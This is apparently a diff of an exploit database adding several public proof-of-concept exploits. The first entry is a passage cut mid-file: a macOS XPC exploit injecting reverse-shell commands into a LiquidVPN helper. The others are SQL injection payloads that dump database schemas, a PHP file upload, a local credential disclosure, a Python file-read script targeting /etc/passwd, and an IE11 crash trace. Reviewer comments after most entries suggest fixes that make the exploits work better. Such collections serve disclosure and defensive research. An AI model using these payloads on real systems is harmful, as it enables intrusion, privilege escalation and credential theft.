xpc_dictionary_set_string(message, "command_line", "bash -i >& /dev/tcp/127.0.0.1/9999 0>&1");
break;
case 2:
// "openvpncmd"
xpc_dictionary_set_string(message, "cmd", "openvpn");
xpc_dictionary_set_string(message, "openvpncmd", "bash -i >& /dev/tcp/127.0.0.1/9999 0>&1");
break;
case 3:
// cmd injection via "path_tun". "path_tap" is affected by the same bug
mkdir("/tmp/__dummy00_", 0755);
xpc_dictionary_set_string(message, "cmd", "openvpn");
xpc_dictionary_set_string(message, "path_tun", "/tmp/__dummy00_;bash -i >& /dev/tcp/127.0.0.1/9999 0>&1;cat");
rmdir("/tmp/__dummy00_");
break;
case 4:
// load arbitrary kext via "path_tun". "path_tap" is affected by the same bug
xpc_dictionary_set_string(message, "cmd", "openvpn");
xpc_dictionary_set_string(message, "path_tun", "/tmp/tun.kext");
break;
default:
what(argv[0]);
return 0;
}
printf("[+] sending xpc message.\n");
xpc_connection_t connection = xpc_connection_create_mach_service("com.smr.liquidvpn.OVPNHelper", NULL, 0);
if (connection == NULL) {
printf("[-] connection to xpc service failed.\n");
return 1;
}
xpc_connection_set_event_handler(connection, ^(xpc_object_t e) {
// we don't need that here.
});
xpc_connection_resume(connection);
printf("[+] check your listener.\n");
xpc_object_t result = xpc_connection_send_message_with_reply_sync(connection, message);
printf("[+] bye.\n");
return 0;
}


@ -0,0 +1,59 @@
# Exploit Title: SiAdmin 1.1 - 'id' SQL Injection
# Dork: N/A
# Date: 2018-11-04
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.bubul.net/
# Software Link: https://kent.dl.sourceforge.net/project/siadmin/SiAdmin%201.1/SiAdmin%201.1.zip
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/modul/mod_beasiswa/print.php?op=print&id=[SQL]
#
GET /[PATH]/modul/mod_beasiswa/print.php?op=print&id=-4%27%20%20UNION%20%20SELECT%201,2,3,4,5,6,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),8--%20- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=va3kfka1v4dqvadpkdpm7f7vs0
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 04 Nov 2018 13:22:52 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, max-age=0, must-revalidate
Pragma: public
Content-Disposition: inline; filename="Ansanwan-Laporan.pdf"
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/pdf
# POC:
# 2)
# http://localhost/[PATH]/show.php?op=beasiswa&act=lihat&id=[SQL]
#
GET /[PATH]/show.php?op=beasiswa&act=lihat&id=%2d%34%27%20%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%37%2c%38%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=va3kfka1v4dqvadpkdpm7f7vs0
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 04 Nov 2018 13:30:25 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6079
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
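Review bot: Neither PoC states whether `modul/mod_beasiswa/print.php` and `show.php` are reachable without authentication; both requests at L835 and L859 carry a `PHPSESSID` cookie, so the precondition should be spelled out in the header (e.g. `# Authentication: not required` or `# Requires: logged-in session`), since it decides the severity of the finding. The first endpoint answers with `Content-Type: application/pdf` (L854), so the extracted schema is rendered inside a generated PDF rather than an HTML page — a line saying so would save testers from thinking the payload failed. No remediation is given; a parameterized query (or an integer cast) for `id` in both scripts is the fix to name.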


@ -0,0 +1,97 @@
# Exploit Title: WebVet 0.1a - 'id' SQL Injection
# Dork: N/A
# Date: 2018-11-04
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://webvet.exreality.net/
# Software Link: https://netix.dl.sourceforge.net/project/webvet/webvet_2013_07_08.zip
# Version: 0.1a
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# /[PATH]/client.php
#091 else if (!empty($_POST['form_search_client']))
#092 {
#093 $searchedClient = new Client();
#094 if (!empty($_POST['id']))
#095 $searchedClient->id = $_POST['id'];
#096 if (!empty($_POST['lastname']))
#097 $searchedClient->lastname = $_POST['lastname'];
#098 if (!empty($_POST['patient']))
#099 $searchedClient->patient = $_POST['patient'];
#100
#101 // do the search
#102 $db_connection = db_open(db_user_name, db_user_passw, db_name);
#103 if (!$db_connection) die;
#104 $clients = db_search_client($searchedClient, clients_table_name, $db_connection);
#105 include "clients_view.php";
#106 }
# POC:
# 1)
# http://localhost/[PATH]/client.php
#
POST /[PATH]/client.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 525
id=1 UNION SELECT 0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)-- -&form_search_client=Efe
HTTP/1.1 200 OK
Date: Sun, 04 Nov 2018 18:13:34 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 1229
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/client.php
#
POST /[PATH]/client.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 501
lastname=' UNION SELECT 0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)-- -&form_search_client=Efe
HTTP/1.1 200 OK
Date: Sun, 04 Nov 2018 18:19:04 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 1229
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 3)
# http://localhost/[PATH]/client.php
#
POST /[PATH]/client.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 499
patient=' UNION SELECT 0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)-- -&form_search_client=Efe
HTTP/1.1 200 OK
Date: Sun, 04 Nov 2018 18:21:05 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 1229
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
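Review bot: The title names only the `id` parameter, but PoCs 2 and 3 at L944 and L966 inject through `lastname` and `patient`, and the quoted source at L896–L901 shows all three `$_POST` fields copied into the search object unfiltered; the header should reflect that, e.g. `# Exploit Title: WebVet 0.1a - 'id' / 'lastname' / 'patient' SQL Injection`. The actual sink, `db_search_client` (L906), is not shown, so the string concatenation is inferred rather than demonstrated — quoting the query-building line from that function would make the finding verifiable. The requests carry no session cookie and the handler is a plain POST branch, so this appears to be pre-authentication; stating that explicitly would help readers triage.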


@ -0,0 +1,87 @@
# Exploit Title: Poppy Web Interface Generator 0.8 - Arbitrary File Upload
# Dork: N/A
# Date: 2018-11-04
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://poppy.dc-development.de/
# Software Link: https://master.dl.sourceforge.net/project/poppy-beta-rc/poppy_0.8_beta_rc.zip
# Version: 0.8
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/phpWebFileManager-0.7/index.php
#
POST /[PATH]/phpWebFileManager-0.7/index.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: multipart/form-data; boundary=
---------------------------497318546845924055941951022
Content-Length: 732
-----------------------------497318546845924055941951022
Content-Disposition: form-data; name="fm_filename"
-----------------------------497318546845924055941951022
Content-Disposition: form-data; name="fm_dir"
-----------------------------497318546845924055941951022
Content-Disposition: form-data; name="fm_action"
upload_file
-----------------------------497318546845924055941951022
Content-Disposition: form-data; name="fm_userfile[0]"; filename="phpinfo.php"
Content-Type: application/force-download
<?php
phpinfo();
?>
-----------------------------497318546845924055941951022
Content-Disposition: form-data; name="fm_submit"
File upload
-----------------------------497318546845924055941951022--
HTTP/1.1 200 OK
Date: Sun, 04 Nov 2018 12:10:16 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/poppy_app/public/[FILE]
#
<html>
<body>
#File Upload:
<form enctype="multipart/form-data" method="post" action="http://localhost/[PATH]/phpWebFileManager-0.7/index.php">
<input value="" name="fm_filename" type="hidden">
<input value="" name="fm_dir" type="hidden">
<input value="upload_file" name="fm_action" type="hidden">
<input value="" name="fm_userfile[0]" type="file">
<input name="fm_submit" value="File upload" type="submit">
</form>
#Create File:
<form method="post" action="http://localhost/[PATH]/phpWebFileManager-0.7/index.php">
<input value="" name="fm_filename" type="hidden">
<input value="" name="fm_dir" type="hidden">
<input value="create_file" name="fm_action" type="hidden">
<input value="test.php" name="fm_new_filename" type="text">
<input name="fm_submit" value="Create file" type="submit">
</form>
#File Edit:
<form method="post" action="http://localhost/[PATH]/phpWebFileManager-0.7/index.php">
<input value="test.php" name="fm_filename" type="hidden">
<input value="" name="fm_dir" type="hidden">
<input value="save_file" name="fm_action" type="hidden">
<textarea id="code" name="fm_file_data" rows="40" cols="140"></textarea>
<input name="fm_submit" value="Save" type="submit">
</form>
</body>
</html>
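Review bot: The `Content-Type: multipart/form-data; boundary=` header at L1000 has its boundary value wrapped onto L1001, so the request as pasted is malformed and the server will not parse the body; join them into the single header line `Content-Type: multipart/form-data; boundary=---------------------------497318546845924055941951022`. The advisory does not say whether the bundled `phpWebFileManager-0.7/index.php` requires a login — no cookie is sent at L993–L999, which suggests it does not, but that should be stated rather than left to inference. It also should say where the uploaded file lands; L1030 hints at `poppy_app/public/[FILE]`, but a one-line note confirming that the upload directory is web-served (which is what turns an upload into code execution) is missing.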


@ -0,0 +1,73 @@
# Exploit Title: Mongo Web Admin 6.0 - Information Disclosure
# Dork: N/A
# Date: 2018-11-04
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.mongoadmin.org/
# Software Link: https://netix.dl.sourceforge.net/project/mongo-web-admin/mongoDesktopAdminSetup-beta-6.exe
# Version: 6.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# Status/Protocol/Local host/Local port/Remote host/Remote port/PID/Process name
# Established/TCP/127.0.0.1/6376/127.0.0.1/6393/4520/mongoDesktopAdmin
# Established/TCP/127.0.0.1/6376/127.0.0.1/6394/4520/mongoDesktopAdmin
# Established/TCP/127.0.0.1/6393/127.0.0.1/6376/4520/mongoDesktopAdmin
# Established/TCP/127.0.0.1/6394/127.0.0.1/6376/4520/mongoDesktopAdmin
GET /test.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,* /*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/
Cookie: PHPSESSID=npbo6p4par2h1flfvc4lv04ok4; mongo-web-admin-session=bvf9kg9nod2gttd6rstk2l4q30
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
HTTP/1.1 200 OK
Date: Sun, 04 Nov 2018 16:27:16 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 490
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
header ('Content-type: text/html; charset=UTF-8');
$urlemiz= "http://127.0.0.1:6376/webservice/Data/";
$y="connections.json";
$jsonveri = file_get_contents($urlemiz.$y);
$ver = json_decode($jsonveri,true);
echo "<pre>\n";
print_r($ver);
echo "\n</pre>";
/**
Array
(
[0] => Array
(
[id] => 0.81395000 1342373198
[name] => Default
[host] => localhost
[port] => 27017
[user] => user1
[password] => pass1
)
[1] => Array
(
[id] => 0.54691200 1541333748
[name] => New connection
[host] => localhost
[port] => 27017
[user] => user2
[password] => pass2
)
)
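Review bot: The listener serving `/webservice/Data/connections.json` is bound to `127.0.0.1:6376` per the connection table at L1077–L1080, so the disclosure is reachable only from the local host (by any same-host process or user, or by a page the victim's browser renders from a local origin, as the PHP PoC at L1101–L1104 itself is), and the advisory should state that scope plainly. The fetch at L1104 sends no credentials, and the response at L1118–L1119 and L1127–L1128 contains MongoDB usernames and passwords in clear text, so two separate weaknesses are present — an unauthenticated local web service and plaintext credential storage — and both deserve a line in the description. Remediation to name: require an authentication token on the local web service and store connection passwords in the OS credential store rather than in a readable JSON document.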

33
exploits/php/webapps/45780.py Executable file

@ -0,0 +1,33 @@
# Exploit Title: PHP-Proxy 3.0.3 - Local File Inclusion
# Date: 04.11.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Contact: https://pentest.com.tr
# Vendor Homepage: https://www.php-proxy.com/
# Software Link: https://github.com/Athlon1600/php-proxy-app
# Version: v3.0.3
# Category: Webapps
# Tested on: XAMPP for Linux
# Description: Any user can read files from the server
# without authentication due to an existing LFI in the following path:
# http://target/index.php?q=file:///[FilePath]
# PoC
#!/usr/bin/python
import urllib2, httplib, sys
print "\n[*] PHP-Proxy 3.0.3 LFI PoC By AkkuS"
print "[*] My Blog - https://www.pentest.com.tr\n"
print "[+] usage: python " + __file__ + " http://<target_ip/domain>"
if (len(sys.argv) != 2):
print "[*] Usage: poc.py <target_ip/domain>"
exit(0)
ip_add = sys.argv[1]
fd = raw_input('[+] File or Directory: aka /etc/passwd and etc..\n')
print "Exploiting....."
print '\n'
URL = "http://" + ip_add + "/index.php?q=file:///" + fd + ""
print urllib2.urlopen(URL).read()
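Review bot: The usage banner at L1154 tells the operator to pass `http://<target_ip/domain>`, but L1162 prepends `"http://"` again, so following the banner yields `http://http://…` and the request fails; L1156 prints a second, different usage string. Either drop the scheme from the banner or build the URL from the argument as given, and URL-encode the user-supplied path: `URL = ip_add.rstrip('/') + "/index.php?q=" + urllib.quote("file://" + fd, safe='')` (with `import urllib`), which also avoids the `file:////etc/passwd` produced today when `fd` is absolute. The vulnerability described at L1146–L1148 appears to be an unrestricted URL scheme in the proxy's `q` parameter (arbitrary file read / SSRF) rather than a PHP include, so "Local File Inclusion" in the title is a loose fit — worth a clarifying sentence. The script is Python 2 only (`print` statements, `urllib2`, `raw_input`), which the header should state.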


@ -0,0 +1,37 @@
Exploit Title: Voovi Social Networking Script 1.0 - 'user' SQL Injection
# Dork: N/A
# Date: 2018-11-04
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.adminspoint.com/voovi/index.php
# Software Link: https://netix.dl.sourceforge.net/project/voovi/voovi%20a%20social%20networking%20script.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/?
#
POST /[PATH]/? HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 165
user=1' UNION SELECT NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL-- -&password=&action=login&submit=
HTTP/1.1 200 OK
Date: Sun, 04 Nov 2018 14:22:41 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: PHPSESSID=v8nhfofpnrt6a4clfqbrp7aa00; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 5987
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
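Review bot: The header line at L1168 is missing its leading `# `, unlike every other field in the block; write `# Exploit Title: Voovi Social Networking Script 1.0 - 'user' SQL Injection`. The PoC at L1191 only shows that a 22-column `UNION SELECT NULL…` through the login `user` field returns HTTP 200 with a fresh `Set-Cookie: PHPSESSID` (L1196); it does not say what this achieves — an authentication bypass, a base for data extraction — nor which script handles `action=login`, so impact cannot be judged from the entry. A response excerpt or a follow-up payload demonstrating a logged-in state would make the claim concrete.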


@ -0,0 +1,193 @@
# Exloit Title: Microsoft Internet Explorer 11 - Null Pointer Difference
# Author: Gjoko 'LiquidWorm' Krstic @zeroscience
# Date: 2018-11-03
# Vendor: Microsoft Corporation
# Product web page: https://www.microsoft.com
# Affected version: 11.345.17134.0 (Update Versions: 11.0.90 (KB4462949))
# 11.1387.15063.0 (Update Versions: 11.0.90 (KB4462949))
# 11.0.9600.18282 (Update Versions: 11.0.30 (KB3148198))
# 11.0.9600.17843 (Update Versions: 11.0.20 (KB3058515))
# Tested on: Microsoft Windows 10 (EN) (64bit)
# Microsoft Windows 7 SP1 (EN) (32/64bit)
# Affected module: mshtml.dll
# Affected functions: Tree::Notify_InvalidateDisplay
# CTreeNode::EnsureNoDependentLayoutFixup
# CMarkup::BuildDescendentsList
# References:
# Advisory ID: ZSL-2018-5499
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5499.php
# Desc: The crash is caused due to a NULL pointer dereference access violation inside the
# 'Tree::Notify_InvalidateDisplay' function while parsing malformed DOM elements. The issue
# was discovered using the Domato fuzzer.
# Microsoft Internet Explorer 11 Tree::Notify_InvalidateDisplay Null Pointer Dereference
# PoC: https://www.zeroscience.mk/codes/msie11_nullptr_fuzz-33.html.rar
# Trace:
################################################################################################
(e9c.142c): Access violation - code c0000005 (!!! second chance !!!)
eax=21b9efa0 ebx=21b9efac ecx=21b9efa0 edx=00000000 esi=00000000 edi=187a8fc4
eip=63f04e48 esp=08c39ab8 ebp=08c39ac4 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216
MSHTML!CTreeNode::EnsureNoDependentLayoutFixup+0x43:
63f04e48 f70600010000 test dword ptr [esi],100h ds:002b:00000000=????????
0:007> k
# ChildEBP RetAddr
00 08c39ac4 63a52ddf MSHTML!CTreeNode::EnsureNoDependentLayoutFixup+0x43
01 08c39bd0 63a523c5 MSHTML!CMarkup::InsertElementInternalNoInclusions+0x1f3
02 08c39bf8 63a529d3 MSHTML!CMarkup::InsertElementInternal+0x3d
03 08c39c38 63a52a54 MSHTML!CDoc::InsertElement+0x9b
04 08c39cf8 63a3ca96 MSHTML!InsertDOMNodeHelper+0x154
05 08c39db8 63a3cc73 MSHTML!CElement::InsertBeforeHelper+0x22b
06 08c39ddc 63a3cff3 MSHTML!CElement::InsertBefore+0x2f
07 08c39e70 63a3cf06 MSHTML!CElement::Var_appendChild+0xb3
08 08c39ea0 6de5e6ee MSHTML!CFastDOM::CNode::Trampoline_appendChild+0x75
09 08c39f08 6de582cd jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x101
0a 08c39f50 6df0833d jscript9!Js::JavascriptFunction::CallFunction<1>+0x91
0b 08c39f74 6dffc483 jscript9!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutCallI> >+0x53
0c 08c39fa0 6dffc45c jscript9!Js::InterpreterStackFrame::OP_ProfileReturnTypeCallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutCallI> >+0x1c
0d 08c39fc0 6dffc428 jscript9!Js::InterpreterStackFrame::OP_ProfiledReturnTypeCallI<Js::OpLayoutCallI>+0x2a
0e 08c3a1b0 6dee5371 jscript9!Js::InterpreterStackFrame::Process+0x4e90
0f 08c3a1e8 6dee53d0 jscript9!Js::InterpreterStackFrame::OP_TryCatch+0x49
10 08c3a3d8 6de5c96b jscript9!Js::InterpreterStackFrame::Process+0x39dc
11 08c3bde4 0d8c0fd9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x1ce
WARNING: Frame IP not in any known module. Following frames may be wrong.
12 08c3bdf0 6de5c22d 0xd8c0fd9
13 08c3bfe8 6de5c96b jscript9!Js::InterpreterStackFrame::Process+0x1940
14 08c3c104 0d8c0fe1 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x1ce
15 08c3c110 6de582cd 0xd8c0fe1
16 08c3c158 6de58a05 jscript9!Js::JavascriptFunction::CallFunction<1>+0x91
17 08c3c1cc 6de5893f jscript9!Js::JavascriptFunction::CallRootFunction+0xc1
18 08c3c214 6de588bf jscript9!ScriptSite::CallRootFunction+0x42
19 08c3c244 6de5d0f0 jscript9!ScriptSite::Execute+0x61
1a 08c3c2a0 6de5d02c jscript9!ScriptEngineBase::ExecuteInternal<0>+0xbb
1b 08c3c2b8 63a362a4 jscript9!ScriptEngineBase::Execute+0x1c
1c 08c3c374 63a3613e MSHTML!CListenerDispatch::InvokeVar+0x15a
1d 08c3c3a0 63a35e01 MSHTML!CListenerDispatch::Invoke+0x6d
1e 08c3c440 6398e7d2 MSHTML!CEventMgr::_InvokeListeners+0x1fe
1f 08c3c5b4 639d2863 MSHTML!CEventMgr::Dispatch+0x3bb
20 08c3c5dc 63eadc91 MSHTML!CEventMgr::DispatchEvent+0x90
21 08c3c5f0 63e94da9 MSHTML!CSVGElement::Fire_SVGLoad+0x46
22 08c3c608 63eadc43 MSHTML!CSVGSVGElement::Fire_SVGLoad+0x19
23 08c3c620 63dafdc1 MSHTML!CSVGElement::Fire_SVGLoad_Async_Handler+0x23
24 08c3c64c 6398f25c MSHTML!CAsyncEventQueue::DispatchAllEvents+0x41c3ea
25 08c3c6a0 771462fa MSHTML!GlobalWndProc+0x2d3
26 08c3c7bc 00a3ee48 user32!InternalCallWinProc+0x23
27 08c3c7c0 076bafe0 0xa3ee48
28 08c3c7c4 00000000 0x76bafe0
################################################################################################
(15e4.1634): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=22a98fa0 ecx=00000061 edx=000000c1 esi=22a96fac edi=0969c384
eip=63916681 esp=0969c1d8 ebp=0969c200 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
MSHTML!CMarkup::BuildDescendentsList+0x158:
63916681 81b828030000609ffd63 cmp dword ptr [eax+328h],offset MSHTML!__vtguard (63fd9f60) ds:002b:00000328=????????
0:008> k
# ChildEBP RetAddr
00 0969c200 6384f86d MSHTML!CMarkup::BuildDescendentsList+0x158
01 0969c350 639b1597 MSHTML!CMarkup::Notify+0x17b
02 0969c3b8 639b1431 MSHTML!CMarkup::OnLoadStatusDone+0x14b
03 0969c3cc 639b078b MSHTML!CMarkup::OnLoadStatus+0xfa
04 0969c810 639aa322 MSHTML!CProgSink::DoUpdate+0x4c7
05 0969c81c 6382e541 MSHTML!CProgSink::OnMethodCall+0x12
06 0969c868 6382de4a MSHTML!GlobalWndOnMethodCall+0x16d
07 0969c8b8 771462fa MSHTML!GlobalWndProc+0x2e5
08 0969c8e4 77146d3a user32!InternalCallWinProc+0x23
09 0969c95c 771477c4 user32!UserCallWinProcCheckWow+0x109
0a 0969c9bc 7714788a user32!DispatchMessageWorker+0x3b5
0b 0969c9cc 6ce3f7c8 user32!DispatchMessageW+0xf
0c 0969fb98 6cf8f738 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464
0d 0969fc58 7732e61c IEFRAME!LCIETab_ThreadProc+0x37b
0e 0969fc70 72f93991 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1c
0f 0969fca8 764b336a IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94
10 0969fcb4 778a9902 kernel32!BaseThreadInitThunk+0xe
11 0969fcf4 778a98d5 ntdll!__RtlUserThreadStart+0x70
12 0969fd0c 00000000 ntdll!_RtlUserThreadStart+0x1b
################################################################################################
FAILURE_BUCKET_ID: NULL_CLASS_PTR_READ_AVRF_c0000005_MSHTML.dll!Tree::Notify_InvalidateDisplay
BUCKET_ID: APPLICATION_FAULT_NULL_CLASS_PTR_READ_INVALID_POINTER_READ_AFTER_CALL_AVRF_MSHTML!Tree::Notify_InvalidateDisplay+19
FAILURE_EXCEPTION_CODE: c0000005
FAILURE_IMAGE_NAME: MSHTML.dll
--
(d98.d24): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
MSHTML!Tree::Notify_InvalidateDisplay+0x1f:
555ae81a 81b81804000080380100 cmp dword ptr [eax+418h],13880h ds:002b:00000418=????????
